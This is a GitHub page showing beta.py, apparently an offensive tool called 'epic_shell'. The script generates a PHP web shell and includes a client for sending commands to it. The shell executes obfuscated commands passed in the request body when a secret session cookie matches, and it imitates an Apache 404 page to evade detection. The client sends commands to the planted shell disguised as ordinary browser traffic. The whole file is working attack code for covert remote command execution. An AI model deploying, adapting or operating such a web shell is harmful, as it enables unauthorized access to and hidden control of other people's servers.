forked from cwinfosec/epic_shell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbeta.py
116 lines (89 loc) · 3.44 KB
/
beta.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#!/usr/bin/env python3
import argparse
import bcrypt
import os
import random
import requests
import sys
import string
from base64 import b64encode
from termcolor import colored
def generate_key(seed):
salt = bcrypt.gensalt(rounds=12, prefix=b'2b')
key = b64encode(bcrypt.hashpw(str(seed).encode("ascii"), salt))
return key.decode()
def generate_shell(key, gen_pkey):
shell = ['<?php',
'$payload_key = \'%s\';' % gen_pkey,
'if ($_COOKIE["session"] === "%s") {' % key,
' $payload = file_get_contents("php://input");',
' $command = base64_decode($payload) ^ $payload_key;',
' echo shell_exec($command);',
' } else {',
' http_response_code(404);',
' echo "<html><head>";',
' echo "<title>404 Not Found</title>";',
' echo "</head><body>";',
' echo "<h1>Not Found</h1>";',
' echo "<p>The requested URL was not found on this server.</p>";',
' echo "<hr>";',
' echo "<address>Apache Server at localhost Port 80</address>";',
' echo "</body></html>";',
' die();',
' }',
'?>']
with open('./shell.php', 'w+') as file:
for line in shell:
file.write(line + '\n')
file.close()
print(colored('[+] ', "green") + 'Created new shell.php file.')
def connect(url, hmac, payload_key):
while True:
cmd = str(input(colored("shell~$ ", "yellow", attrs=["bold"])))
if cmd == 'exit' or cmd == 'quit':
sys.exit(0)
if cmd == 'clear':
try:
os.system('clear')
except:
os.system('cls')
s1 = cmd
s2 = payload_key
custom_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',
'Cookie':'session=' + hmac,
}
try:
s = requests.Session()
r = s.post(url, data=b64encode(xor_function(s1,s2).encode("ascii")), headers=custom_headers, verify=False)
print(r.text)
except(requests.ConnectionError, requests.HTTPError, requests.Timeout) as e:
print(e)
def xor_function(s1, s2):
return "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(s1,s2)])
def main(args):
special_chars = '!@#%^&*()-=_+[]{}";:,./<>?'
charset = string.ascii_uppercase + string.ascii_lowercase + string.digits + special_chars
seed = ''.join(random.choices(charset, k=50))
gen_pkey = ''.join(random.choices(charset, k=8))
if args.connect:
payload_key = args.pkey
url = args.connect
hmac = args.key
print(colored('[+] ', "blue") + 'Connecting to %s\nUsing HMAC: %s\nUsing Payload Key: %s\n' % (url,hmac,payload_key))
connect(url, hmac, payload_key)
if args.generate:
print(colored('[+] ', 'blue') + 'Seed: ' + seed)
print(colored('[+] ', 'blue') + 'Payload Key: ' + gen_pkey)
key = generate_key(seed)
print(colored('[+] ', 'blue') + 'Key: %s' % key)
generate_shell(key, gen_pkey)
if __name__ in "__main__":
formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50)
parser = argparse.ArgumentParser(description='An Epic Web Shell - @cwinfosec', formatter_class=formatter)
parser.add_argument("-g", "--generate", dest="generate", help="Generate new key and webshell.", action="store_true", required=False)
parser.add_argument("-c", "--connect", dest="connect", type=str, help="URL of web shell to connect to.", required=False)
parser.add_argument("-k", "--key", dest="key", type=str, help="Auth key for the generated web shell.", required=False)
parser.add_argument("-pk", "--payload-key", dest="pkey", help="Payload key for webshell.", required=False)
args = parser.parse_args()
main(args)